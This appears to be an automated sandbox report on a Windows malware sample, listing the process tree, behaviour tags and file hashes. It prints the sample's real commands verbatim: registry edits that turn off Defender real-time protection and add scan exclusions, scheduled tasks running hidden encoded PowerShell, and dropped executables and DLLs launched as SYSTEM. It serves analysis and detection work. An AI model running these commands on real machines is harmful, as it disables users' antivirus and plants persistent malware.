\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:1400
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1612 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:548 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:1892
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:836
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ggdhuJVia" /SC once /ST 03:45:49 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:1272
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ggdhuJVia"4⤵PID:1532
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ggdhuJVia"4⤵PID:1360
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "btdLLYXHQMmQUGTlUt" /SC once /ST 12:00:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\LmczqcQkeJOtzIinI\KpxCpBeQMOzTFHC\iVIEJfC.exe\" x9 /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1224
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {3EADDC50-30A9-442E-BA28-3688D2C17848} S-1-5-21-4063495947-34355257-727531523-1000:RYNKSFQE\Admin:Interactive:[1]1⤵PID:1680
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:876 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1020
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1704 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1304
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1480 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1460
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1880 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:656
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1588
-
C:\Windows\system32\taskeng.exetaskeng.exe {4C5B247B-A8E4-418B-8D82-DCBACD9D41DD} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1476
-
C:\Users\Admin\AppData\Local\Temp\LmczqcQkeJOtzIinI\KpxCpBeQMOzTFHC\iVIEJfC.exeC:\Users\Admin\AppData\Local\Temp\LmczqcQkeJOtzIinI\KpxCpBeQMOzTFHC\iVIEJfC.exe x9 /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:604 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gSCVnwVcP" /SC once /ST 00:01:47 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1324
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gSCVnwVcP"3⤵PID:1612
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gSCVnwVcP"3⤵PID:2040
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:1700
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:1020
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1576
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:2024
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gFpBVvogU" /SC once /ST 04:52:38 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:968
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gFpBVvogU"3⤵PID:992
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gFpBVvogU"3⤵PID:2032
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\vxnfmHcoTdyXHjbW" /t REG_DWORD /d 0 /reg:323⤵PID:828
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\vxnfmHcoTdyXHjbW" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1500
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\vxnfmHcoTdyXHjbW" /t REG_DWORD /d 0 /reg:643⤵PID:584
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\vxnfmHcoTdyXHjbW" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:944
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\vxnfmHcoTdyXHjbW" /t REG_DWORD /d 0 /reg:323⤵PID:956
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\vxnfmHcoTdyXHjbW" /t REG_DWORD /d 0 /reg:324⤵PID:1028
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\vxnfmHcoTdyXHjbW" /t REG_DWORD /d 0 /reg:643⤵PID:2024
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\vxnfmHcoTdyXHjbW" /t REG_DWORD /d 0 /reg:644⤵PID:1044
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\vxnfmHcoTdyXHjbW\BHmrhlwZ\dtjPweJbHmBLsloi.wsf"3⤵PID:788
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\vxnfmHcoTdyXHjbW\BHmrhlwZ\dtjPweJbHmBLsloi.wsf"3⤵
- Modifies data under HKEY_USERS
PID:1920 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GMliWaWQeuyztaRLisR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1376
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GMliWaWQeuyztaRLisR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1324
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TmnDpdHNqOsU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1524
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TmnDpdHNqOsU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1056
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gtqHlFARU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1880
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gtqHlFARU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1520
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\juVQMoXUGuUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1280
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\juVQMoXUGuUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:952
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qnGLeUyabYLvC" /t REG_DWORD /d 0 /reg:324⤵PID:1052
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qnGLeUyabYLvC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:944
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\rkiISvCGUxzYryVB" /t REG_DWORD /d 0 /reg:324⤵PID:1772
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\rkiISvCGUxzYryVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1820
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\LmczqcQkeJOtzIinI" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:968
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\LmczqcQkeJOtzIinI" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:452
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\vxnfmHcoTdyXHjbW" /t REG_DWORD /d 0 /reg:324⤵PID:964
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\vxnfmHcoTdyXHjbW" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1324
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GMliWaWQeuyztaRLisR" /t REG_DWORD /d 0 /reg:324⤵PID:1876
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GMliWaWQeuyztaRLisR" /t REG_DWORD /d 0 /reg:644⤵PID:748
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TmnDpdHNqOsU2" /t REG_DWORD /d 0 /reg:324⤵PID:1092
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TmnDpdHNqOsU2" /t REG_DWORD /d 0 /reg:644⤵PID:556
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gtqHlFARU" /t REG_DWORD /d 0 /reg:324⤵PID:656
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gtqHlFARU" /t REG_DWORD /d 0 /reg:644⤵PID:1460
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\juVQMoXUGuUn" /t REG_DWORD /d 0 /reg:324⤵PID:1500
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\juVQMoXUGuUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1052
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qnGLeUyabYLvC" /t REG_DWORD /d 0 /reg:324⤵PID:552
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qnGLeUyabYLvC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1772
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\rkiISvCGUxzYryVB" /t REG_DWORD /d 0 /reg:324⤵PID:1360
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\rkiISvCGUxzYryVB" /t REG_DWORD /d 0 /reg:644⤵PID:1064
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\LmczqcQkeJOtzIinI" /t REG_DWORD /d 0 /reg:324⤵PID:972
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\LmczqcQkeJOtzIinI" /t REG_DWORD /d 0 /reg:644⤵PID:1376
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\vxnfmHcoTdyXHjbW" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:964
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\vxnfmHcoTdyXHjbW" /t REG_DWORD /d 0 /reg:644⤵PID:432
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gPZwxJGCd" /SC once /ST 06:18:16 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:384
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gPZwxJGCd"3⤵PID:1744
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gPZwxJGCd"3⤵PID:552
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:1052
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:1820
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:1772
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:628
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "WoEPKTtlaFppYNUdK" /SC once /ST 10:52:17 /RU "SYSTEM" /TR "\"C:\Windows\Temp\vxnfmHcoTdyXHjbW\ooXeARFAZifpanP\TcDNtkY.exe\" zV /site_id 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:788
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "WoEPKTtlaFppYNUdK"3⤵PID:972
-
-
-
C:\Windows\Temp\vxnfmHcoTdyXHjbW\ooXeARFAZifpanP\TcDNtkY.exeC:\Windows\Temp\vxnfmHcoTdyXHjbW\ooXeARFAZifpanP\TcDNtkY.exe zV /site_id 525403 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1952 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "btdLLYXHQMmQUGTlUt"3⤵PID:1636
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:1948
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:108
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:432
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:1524
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\gtqHlFARU\KAoMwk.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ZOFPbDsrFcqiUVB" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1876
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ZOFPbDsrFcqiUVB2" /F /xml "C:\Program Files (x86)\gtqHlFARU\MOpaQiZ.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1380
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "ZOFPbDsrFcqiUVB"3⤵PID:1568
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ZOFPbDsrFcqiUVB"3⤵PID:1976
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "klRqEFizeYaxgo" /F /xml "C:\Program Files (x86)\TmnDpdHNqOsU2\UcDqbdT.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1588
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "BfgEIRWoHSroa2" /F /xml "C:\ProgramData\rkiISvCGUxzYryVB\QhVHcoa.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1932
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "rMOGrjhMYHFIbdzlX2" /F /xml "C:\Program Files (x86)\GMliWaWQeuyztaRLisR\WJtzIzi.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:552
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ryTYDfftFmKPiAwtPPG2" /F /xml "C:\Program Files (x86)\qnGLeUyabYLvC\Jvsdkdt.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:684
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "DbPBwIXvZYySFQJBx" /SC once /ST 02:05:33 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\vxnfmHcoTdyXHjbW\nURPKJId\BgzNigU.dll\",#1 /site_id 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1140
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "DbPBwIXvZYySFQJBx"3⤵PID:968
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:964
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵PID:1232
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:2028
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵PID:1876
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "WoEPKTtlaFppYNUdK"3⤵PID:776
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\vxnfmHcoTdyXHjbW\nURPKJId\BgzNigU.dll",#1 /site_id 5254032⤵PID:604
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\vxnfmHcoTdyXHjbW\nURPKJId\BgzNigU.dll",#1 /site_id 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:1488 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "DbPBwIXvZYySFQJBx"4⤵PID:1976
-
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1348
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:960
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1500
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD50fffe4a601d06c8cd0dc71cdb5f71fbd
SHA14984cd50987b5c5ae41ee23fa9f21a525cc394cd
SHA25612fdaec588e369d129283fd12469e221f9aa5b71e57e90509b750da82a9ab1ef
SHA5128ad2b09076d7ed1e4ab1be5a7e6dd84bfd807b1eacb2f16fc97a5a7aad690b1a4ccfd50f2d470042db3e59e65531228cf59ed4b77fc4b4f6e09d50955e1e829f
-
Filesize
2KB
MD5213aa81471da8a00077ecfd639769037
SHA1df4282b000b62994f33ea60bacccbc2e3eb7c6dc
SHA25622e437d2c050b29bfca4561f196d9a0d6aa0cfb4d9ae3e160a8f5615080f08a2
SHA51212e23f0aebcf2f8e752bf213d1fc042f88c07bea12a22751360e959846a9ebde92a062834eeb76facb5c133d84b492974ecb483822da5a2dc296264ccc5055b3
-
Filesize
2KB
MD559e79b835fdcd04f35023b1d1c76b3bb
SHA1a6c467b2a483fc061932b121f6cee58ce54ec207
SHA256617851916733ce4517bbdbb85cb45dd206143708db5d96e5b721dd98e2bea9ea
SHA512b60a95710d6c99eee8f02b529cb7bd4702b90a26123919c7d8870a99e0256d679daf45a314c02fbc49b9557cf7c1d000850008ea6686359fcce7fb0a6e1ccad3
-
Filesize
2KB
MD5ebcf248655f169b1a5dd181716ad300a
SHA1593b57949287625b8ab9c1efa6718b9cc698f136
SHA256f635ceb5964d5a1456d7e8f70d6b6e36df83763bb140a362904332f38ed4388a
